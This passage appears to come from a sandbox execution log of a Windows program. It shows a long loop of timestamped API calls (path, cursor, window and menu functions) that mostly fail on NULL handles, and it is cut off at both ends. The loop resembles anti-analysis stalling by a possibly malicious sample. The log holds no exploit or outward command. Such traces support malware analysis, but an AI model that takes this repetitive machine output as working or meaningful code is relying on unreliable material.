(i=6) returned 0x1b00018 [0176.120] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.120] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.120] PathFileExistsW (pszPath=0x0) returned 0 [0176.120] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.120] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.120] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.120] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.121] GetMenu (hWnd=0x0) returned 0x0 [0176.121] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.121] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.121] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.121] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.121] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.121] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.121] GetStockObject (i=6) returned 0x1b00018 [0176.121] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.121] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.121] PathFileExistsW (pszPath=0x0) returned 0 [0176.121] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.121] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.121] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.121] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.121] GetMenu (hWnd=0x0) returned 0x0 [0176.121] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.121] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.121] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.121] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.121] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.121] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.121] GetStockObject (i=6) returned 0x1b00018 [0176.121] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.121] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.121] PathFileExistsW (pszPath=0x0) returned 0 [0176.121] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.121] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.121] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.121] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.121] GetMenu (hWnd=0x0) returned 0x0 [0176.121] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x571) returned -1 [0176.121] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.121] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.121] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.122] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.122] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.122] GetStockObject (i=6) returned 0x1b00018 [0176.122] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.122] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.122] PathFileExistsW (pszPath=0x0) returned 0 [0176.122] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.122] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.122] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.122] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.122] GetMenu (hWnd=0x0) returned 0x0 [0176.122] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.122] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.122] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.122] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.122] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.122] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.122] GetStockObject (i=6) returned 0x1b00018 [0176.122] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.122] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.122] PathFileExistsW (pszPath=0x0) returned 0 [0176.122] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.122] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.122] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.122] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.122] GetMenu (hWnd=0x0) returned 0x0 [0176.122] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.122] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.122] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.122] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.122] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.122] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.122] GetStockObject (i=6) returned 0x1b00018 [0176.122] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.122] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.123] PathFileExistsW (pszPath=0x0) returned 0 [0176.123] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.123] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.123] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.123] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.123] GetMenu (hWnd=0x0) returned 0x0 [0176.123] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.123] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.123] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.123] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.123] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.123] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.123] GetStockObject (i=6) returned 0x1b00018 [0176.123] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.123] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.123] PathFileExistsW (pszPath=0x0) returned 0 [0176.123] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.123] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.123] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.123] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.123] GetMenu (hWnd=0x0) returned 0x0 [0176.123] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.123] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.123] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.123] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.123] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.123] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.123] GetStockObject (i=6) returned 0x1b00018 [0176.123] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.123] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.123] PathFileExistsW (pszPath=0x0) returned 0 [0176.123] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.123] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.123] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.123] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.123] GetMenu (hWnd=0x0) returned 0x0 [0176.124] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x43f) returned -1 [0176.124] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.124] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.124] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.124] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.124] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.124] GetStockObject (i=6) returned 0x1b00018 [0176.124] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.124] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.124] PathFileExistsW (pszPath=0x0) returned 0 [0176.124] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.124] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.124] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.124] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.124] GetMenu (hWnd=0x0) returned 0x0 [0176.124] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.124] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.124] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.124] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.124] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.124] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.124] GetStockObject (i=6) returned 0x1b00018 [0176.124] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.124] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.124] PathFileExistsW (pszPath=0x0) returned 0 [0176.124] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.124] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.124] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.124] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.124] GetMenu (hWnd=0x0) returned 0x0 [0176.124] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.124] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.124] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.124] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.124] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.125] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.125] GetStockObject (i=6) returned 0x1b00018 [0176.125] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.125] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.125] PathFileExistsW (pszPath=0x0) returned 0 [0176.125] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.125] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.125] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.125] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.125] GetMenu (hWnd=0x0) returned 0x0 [0176.125] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.125] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.125] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.125] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.125] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.125] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.125] GetStockObject (i=6) returned 0x1b00018 [0176.125] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.125] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.125] PathFileExistsW (pszPath=0x0) returned 0 [0176.125] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.125] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.125] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.125] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.125] GetMenu (hWnd=0x0) returned 0x0 [0176.125] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.125] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.125] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.125] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.125] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.125] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.125] GetStockObject (i=6) returned 0x1b00018 [0176.125] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.125] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.125] PathFileExistsW (pszPath=0x0) returned 0 [0176.126] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.126] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.126] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.126] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.126] GetMenu (hWnd=0x0) returned 0x0 [0176.126] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b7) returned -1 [0176.126] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.126] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.126] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.126] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.126] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.126] GetStockObject (i=6) returned 0x1b00018 [0176.126] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.126] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.126] PathFileExistsW (pszPath=0x0) returned 0 [0176.126] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.126] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.126] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.126] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.126] GetMenu (hWnd=0x0) returned 0x0 [0176.126] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.126] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.126] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.126] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.126] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.126] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.126] GetStockObject (i=6) returned 0x1b00018 [0176.126] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.126] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.126] PathFileExistsW (pszPath=0x0) returned 0 [0176.126] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.126] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.126] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.126] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.126] GetMenu (hWnd=0x0) returned 0x0 [0176.126] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.127] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.127] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.127] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.127] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.127] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.127] GetStockObject (i=6) returned 0x1b00018 [0176.127] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.127] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.127] PathFileExistsW (pszPath=0x0) returned 0 [0176.127] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.127] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.127] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.127] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.127] GetMenu (hWnd=0x0) returned 0x0 [0176.127] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.127] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.127] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.127] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.127] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.127] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.127] GetStockObject (i=6) returned 0x1b00018 [0176.127] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.127] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.127] PathFileExistsW (pszPath=0x0) returned 0 [0176.127] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.127] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.127] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.127] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.127] GetMenu (hWnd=0x0) returned 0x0 [0176.127] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.127] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.127] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.127] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.127] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.127] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.128] GetStockObject (i=6) returned 0x1b00018 [0176.128] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.128] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.128] PathFileExistsW (pszPath=0x0) returned 0 [0176.128] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.128] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.128] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.128] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.128] GetMenu (hWnd=0x0) returned 0x0 [0176.128] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe7) returned -1 [0176.128] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.128] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.128] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.128] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.128] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.128] GetStockObject (i=6) returned 0x1b00018 [0176.128] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.128] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.128] PathFileExistsW (pszPath=0x0) returned 0 [0176.128] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.128] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.128] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.128] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.128] GetMenu (hWnd=0x0) returned 0x0 [0176.128] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.128] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.128] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.128] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.128] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.128] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.128] GetStockObject (i=6) returned 0x1b00018 [0176.128] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.128] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.128] PathFileExistsW (pszPath=0x0) returned 0 [0176.128] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.128] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.129] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.129] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.129] GetMenu (hWnd=0x0) returned 0x0 [0176.129] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.129] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.129] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.129] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.129] GetMenuItemRect (in: 